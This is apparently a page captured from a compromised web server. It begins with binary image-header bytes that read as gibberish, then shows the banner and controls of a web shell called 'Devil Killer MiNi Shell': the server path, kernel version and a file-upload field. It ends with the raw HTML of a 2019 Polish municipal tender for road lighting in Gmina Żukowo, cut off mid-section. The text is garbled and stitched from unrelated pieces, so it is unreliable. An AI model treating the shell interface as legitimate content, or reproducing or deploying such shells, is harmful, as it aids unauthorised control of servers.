JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190903/592363-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 592363-N-2019 z dnia 2019-09-03 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Żukowo</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Budowa oświetlenia drogowego na terenie Gminy Żukowo</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Żukowo</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00000000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Gdańska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">52</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">83-330</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Żukowo</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">+48 58 6858300</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">ugzukowo@zukowo.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">+48 58 6858300</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.zukowo.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">https://bip.zukowo.pl/m,2042,roboty-budowlane.html</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://bip.zukowo.pl/m,2042,roboty-budowlane.html</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Ofertę należy złożyć w formie pisemnej. Wykonawca winien zamieścić ofertę w kopercie, która będzie posiadała oznaczenie ,,OFERTA - BUDOWA OŚWIETLENIA DROGOWEGO NA TERENIE GMINY ŻUKOWO. Nr sprawy: ZP.271.24.2019". Koperta oferty powinna uniemożliwiać odczytanie zawartości, być zamknięta i zabezpieczona w sposób uniemożliwiający jej bezśladowe otwarcie.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Gmina Żukowo, ul. Gdańska 52, 83-330 Żukowo. Biuro Obsługi Klienta - pok. 3.</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Budowa oświetlenia drogowego na terenie Gminy Żukowo</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.24.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">trzy</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Budowa oświetlenia drogowego na terenie Gminy Żukowo. Zamówienie obejmuje następujące części: Część 1 -	Budowa oświetlenia drogowego w Baninie:Zadanie 1 - Budowa linii energetycznej oświetleniowej kablowej w Baninie ul. Lawendowa; Zadanie 2 - Budowa oświetlenia ulicznego w Baninie ul. Polna i Słoneczna;Zadanie 3 - Budowa linii energetycznej oświetleniowej kablowej w Baninie ul. Pszenna (kontynuacja zadania);Zadanie 4 - Przebudowa drogi gminnej polegająca na budowie linii kablowej 0,4kV w Baninie ul. Rolnicza;Zadanie 5 - Budowa oświetlenia ulicznego w Baninie ul. Żeglarska.Część 2 -	Budowa oświetlenia drogowego w Chwaszczynie:Zadanie 1 - Budowa sieci oświetleniowa drogowego w Chwaszczynie ul. Kaszubska Droga;Zadanie 2 - Budowa oświetlenia w Chwaszczynie ul. Polna;Zadanie 3 -	Budowa oświetlenia w Chwaszczynie ul. Kawelska, Zaciszna;Zadanie 4 - Budowa kablowej linii oświetlenia ulicznego w Chwaszczynie ul. Leśmiana.Część 3 - Budowa oświetlenia drogowego w Miszewku, Przyjaźni, Żukowie, Lniskach, Tuchomiu:Zadanie 1 - Budowa oświetlenia ulicznego w Miszewku ul. Brzozowa;Zadanie 2 - Budowa oświetlenia drogowego w Przyjaźni ul. Okrężna;Zadanie 3 - Budowa oświetlenia ulicznego w Żukowie ul. Słowackiego; Zadanie 4 - Budowa oświetlenia ulicznego w Żukowie ul. Kościerska;Zadanie 5 - Budowa kabla energetycznego i oświetlenia ulicznego w Lniskach ul. Słoneczna, Klonowa;Zadanie 6 - Budowa oświetlenia ulicznego w Tuchomiu ul. Kwiatowa.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45231400-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316110-9</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">60</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">1.	Zamawiający wymaga realizacji robót budowlanych i opracowania operatu kolaudacyjnego (do dnia zgłoszenia gotowości do odbioru końcowego) w terminie:Część 1 - do 60 dni licząc od dnia przekazania terenu budowy;Część 2 - do 60 dni licząc od dnia przekazania terenu budowy; Część 3 - do 60 dni licząc od dnia przekazania terenu budowy.2.	Przekazanie terenu budowy nastąpi w terminie do 7 dni licząc od dnia zawarcia umowy. Teren budowy zostanie przekazany oddzielnie dla każdego zadania.3.	Wykonawca zgłasza zamawiającemu na piśmie gotowość każdego zadania do odbioru końcowego.4.	Za zrealizowanie zamówienia w terminie zostanie uznane (oddzielnie dla każdego zadania):1)	zakończeniu wszystkich robót budowlanych (potwierdzone wpisem do dziennika budowy),2)	opracowanie operatu kolaudacyjnego,3)	dokonanie przez zamawiającego odbioru końcowego z wynikiem pozytywnym w pierwszym terminie wyznaczonym przez zamawiającego, po zgłoszeniu przez wykonawcę gotowości do odbioru końcowego.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający odstępuje od opisu warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający odstępuje od opisu warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca spełni warunek w zakresie zdolności zawodowej jeżeli wykaże, że:1) posiada doświadczenie:a) w przypadku składania oferty na jedną część zamówienia: polegające na wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dwóch zamówień, z których każde polegało na budowie / rozbudowie / przebudowie oświetlenia drogowego / ulicznego o łącznej wartości robót nie mniejszej niż 70.000,00 PLN netto;b) w przypadku składania oferty na dwie lub trzy części zamówienia: polegające na wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dwóch zamówień, z których każde polegało na budowie / rozbudowie / przebudowie oświetlenia drogowego / ulicznego o łącznej wartości robót nie mniejszej niż 140.000,00 PLN netto.	Za zamówienia wykonane zostaną uznane roboty budowlane zakończone i odebrane przez zamawiającego przed upływem terminu składania ofert.2)	dysponuje osobami o kwalifikacjach zawodowych:a) kierownik budowy - co najmniej jedna osoba posiadająca uprawnienia do pełnienia samodzielnej funkcji w budownictwie w zakresie instalacji, sieci i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów;b)	elektromonterzy - co najmniej dwie osoby z aktualnymi świadectwami kwalifikacyjnymi ,,E";c) co najmniej jedna osoba posiadająca uprawnienia do wykonywania pomiarów ochrony od porażeń prądem elektrycznym (może to być jedna z w/w osób).Uprawnienia do pełnienia samodzielnych funkcji w budownictwie, o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity - Dz. U. z 2019 r., poz. 1186) oraz aktami wykonawczymi do ww. ustawy. Dopuszcza się ważne i odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów.W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jednolity - Dz. U. z 2018 r., poz. 2272 z późn. zm.).Kierownik budowy musi być zrzeszony we właściwej branżowo izbie samorządu zawodowego zgodnie ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity - Dz. U. z 2019 r. poz. 1117).W przypadku składania oferty na więcej niż jedną część zamówienia: a)	zamawiający nie wymaga, aby kierownikiem budowy w przypadku każdej z części zamówienia była inna osoba, b)	te same osoby wskazane jako elektromonterzy oraz posiadające uprawnienia do wykonywania pomiarów ochrony od porażeń prądem elektrycznym mogą realizować zamówienie niezależnie od ilości części, na które została złożona oferta.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">1. W przypadku wykonawców wspólnie ubiegających się o udzieleniezamówienia warunki, o których mowa w pkt III.1.3) zostaną spełnione jeżeli w zakresie zdolnościzawodowej w przypadku: 1) posiadania doświadczenia - każdy z wykonawców wykaże spełnienie w/w warunku oddzielnie albo co najmniej jeden z wykonawców wykaże spełnienie w/w warunku albo wykonawcy wspólnie wykażą spełnienie w/w warunku,2)	dysponowania osobami o kwalifikacjach zawodowych - wykonawcy wspólnie wykażą, że dysponują osobami o wymaganych przez zamawiającego kwalifikacjach. 2. Wykonawca może w celu potwierdzenia spełniania warunków, októrych mowa w w pkt III.1.3) w stosownych sytuacjach oraz w odniesieniu do zamówienia lub jegoczęści, polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie odcharakteru prawnego łączących go z nim stosunków prawnych. 3. Stosowna sytuacja wystąpiwyłącznie w przypadku kiedy: 1) wykonawca, który polega na zdolnościach innych podmiotówudowodni zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tychpodmiotów, w szczególności przedstawiając zobowiązanie (Załącznik nr 7 do SIWZ) tych podmiotówdo oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia; 2)zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lubzawodowe pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniuoraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24ust. 1 pkt 13-22 i ust. 5; 3) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacjizawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeślipodmioty te zrealizują roboty budowlane do realizacji których te zdolności są wymagane. 4. Spółkicywilne będą traktowane jako wykonawcy wspólnie ubiegający się o zamówienie.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> 